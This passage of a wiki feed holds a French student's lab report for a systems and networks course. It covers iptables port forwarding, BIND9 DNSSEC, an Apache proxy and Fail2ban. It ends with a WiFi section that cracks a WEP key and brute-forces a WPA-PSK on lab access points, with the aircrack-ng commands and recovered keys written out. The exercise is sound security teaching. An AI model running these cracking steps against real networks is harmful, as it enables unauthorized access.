64 bytes from 192.168.0.2: icmp_seq=2 ttl=64 time=0.459 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
PING 2001:660:4401:60a0:216:3eff:fe4b:1909 (2001:660:4401:60a0:216:3eff:fe4b:1909) 56 data bytes&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=1 ttl=64 time=0.293 ms&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=2 ttl=64 time=0.249 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;TomPere 2 reçoit bien une réponse !&lt;br /&gt;
&lt;br /&gt;
=== SSH depuis l'extérieur ===&lt;br /&gt;
Pour pouvoir se SSH depuis l'extérieur, il faut commencer par activer l'option sur les machines.&lt;br /&gt;
&lt;br /&gt;
Pour cela, rien de plus simple, il faut aller dans le fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; des VMs et activer la directive &amp;lt;code&amp;gt;PermitRootLogin&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, l'accès de root à distance est autorisé. On peut donc se '''ssh de TomPere2 vers TomPere1 et inversement''' !&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ssh root@2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;C'est pratique, mais ce n'est pas encore ce que l'on veut.&lt;br /&gt;
&lt;br /&gt;
Nous voulons pouvoir se SSH depuis l'extérieur. L'idée va être de dire à la machine mandataire de rediriger certains ports que l'on choisit, vers les machines de services.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, nous appliquerons la redirection suivante :&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Nom de la VM&lt;br /&gt;
!Port de redirection associé&lt;br /&gt;
|-&lt;br /&gt;
|TomPere1&lt;br /&gt;
|2201&lt;br /&gt;
|-&lt;br /&gt;
|TomPere2&lt;br /&gt;
|2202&lt;br /&gt;
|}&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, on met à jour la modification grâce à &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
sysctl -p&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons ajouté les règles suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
nft add chain PREROUTING&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Redirection des ports :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2201 -j DNAT --to-destination 192.168.0.2:22&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.0.3:22&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Pour que les machines internes puissent sortir sur Internet via l’adresse publique de la mandataire, nous avons appliqué une mascarade :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Grâce à cette configuration nous pouvons nous connecter sur les machines de services en SSH depuis l'extérieur, via les commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
ssh root@193.48.57.168 -p2201&lt;br /&gt;
ssh root@193.48.57.168 -p2202&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Super ! L'objectif est atteint. &lt;br /&gt;
&lt;br /&gt;
Remarque : Si on veut que cette configuration reste, il faudra par contre installer le paquet &amp;lt;code&amp;gt;iptables-persistent&amp;lt;/code&amp;gt; et effectuer la sauvegarde.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
apt install iptables-persistent&lt;br /&gt;
netfilter-persistent save&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
inline-signing yes;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12364</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12364"/>
		<updated>2026-02-23T14:06:12Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. A noter que l'on était initialiement sur la distribution Excalibur, mais nous avons finalement changé pour Daedalus.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
